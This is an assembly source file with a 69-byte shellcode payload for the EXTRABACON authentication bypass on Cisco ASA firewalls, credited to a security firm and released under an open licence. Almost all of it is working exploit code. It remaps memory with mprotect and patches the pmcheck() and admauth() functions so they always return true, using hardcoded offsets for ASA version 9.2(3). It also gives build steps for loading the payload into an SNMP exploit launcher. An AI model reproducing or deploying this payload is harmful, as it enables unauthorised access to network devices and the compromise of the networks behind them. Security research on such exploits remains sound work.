;
; Cisco ASA Authentication Bypass (EXTRABACON) Better Shellcode (69 bytes)
;
; Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)
; License: http://opensource.org/licenses/MIT
; Release Date: September 15, 2016
;
; Author: Sean Dillon (2E3C8D72353C9B8C9FF797E753EC4C9876D5727B)
;
; Description:
;            This is not the same shellcode as the Equation Group version,
;            but accomplishes the same task of disabling the auth functions
;            in less stages/bytes. Particularly, it is 69 bytes in one stage
;            instead of 200+ bytes spread across 2 stages.
;
; Build/Run:
;            1) $ nasm shelldisable.nasm
;            2) copy resulting shellcode into preamble_byte/preamble_snmp vars
;            3) Change launcher_snmp to 6 nops (or remove entirely)
;
; Note: The offsets given are for 9.2(3), not part of the original release
;
BITS 32
 
SAFERET_OFFSET  equ     0x9277386       ; where to continue execution
PMCHECK_BOUNDS  equ     0x9b78000       ; mprotect for pmcheck()
PMCHECK_OFFSET  equ     0x9b78010       ; location of pmcheck()
ADMAUTH_BOUNDS  equ     0x8085000       ; page align for admauth()
ADMAUTH_OFFSET  equ     0x8085a40       ; location of admauth()
 
; we must patch pmcheck() and admauth() to always return true
; xor eax, eax  = 31 c0
; inc eax       = 40
; ret           = c3
 
PATCH_CODE  equ 0xc340c031               ; gotta love endianess
 
; we need to fix the function frame to continue normal operation
; eax = 0x0
; esi = 0x0
; edi = 0x0b
; ebx = 0x10
; ebp = [esp - 0x4 (ret)] + 0x??
FIX_EBP         equ     0x48            ; this is 0x58, etc. in some versions
FIX_EDI         equ     0x0f0f0f0b      ; seems static?
FIX_EBX         equ     0x10            ; seems static?
 
_start:
 
    ; these are registers we have to clean up, so we can null them before save
    xor eax, eax
    xor ebx, ebx
    xor esi, esi
    xor ecx, ecx                        ; ecx is volatile register
 
    pusha                               ; save all registers
 
    add ch, 0x10                        ; ecx = 0x1000
    add dl, 0x7                         ; edx = 0x7
    add al, 0x7d                        ; eax = 0x7d
 
    push eax                            ; save eax for second call
 
    mov ebx, PMCHECK_BOUNDS             ; ebx = byte boundary for mprotect
 
    int 0x80                            ; sys_mprotect(PMCHECK_BOUNDS, 0x1000, 0x7)
 
    pop eax                             ; eax = 0x7d
    mov ebx, ADMAUTH_BOUNDS             ; second function page align
 
    int 0x80                            ; sys_mprotect(ADMAUTH_BOUNDS, 0x1000, 0x7)
 
    push PATCH_CODE
    pop eax
 
    mov dword [PMCHECK_OFFSET], eax     ; write patch code to both functions
    mov dword [ADMAUTH_OFFSET], eax
 
    popa                                ; restore all registers
 
    push SAFERET_OFFSET                 ; push the safe return address
 
    ; these registers are pre-xored
    add bl, FIX_EBX
    mov edi, FIX_EDI
 
    mov ebp, esp
    add ebp, FIX_EBP
 
    ret                                 ; return to safe address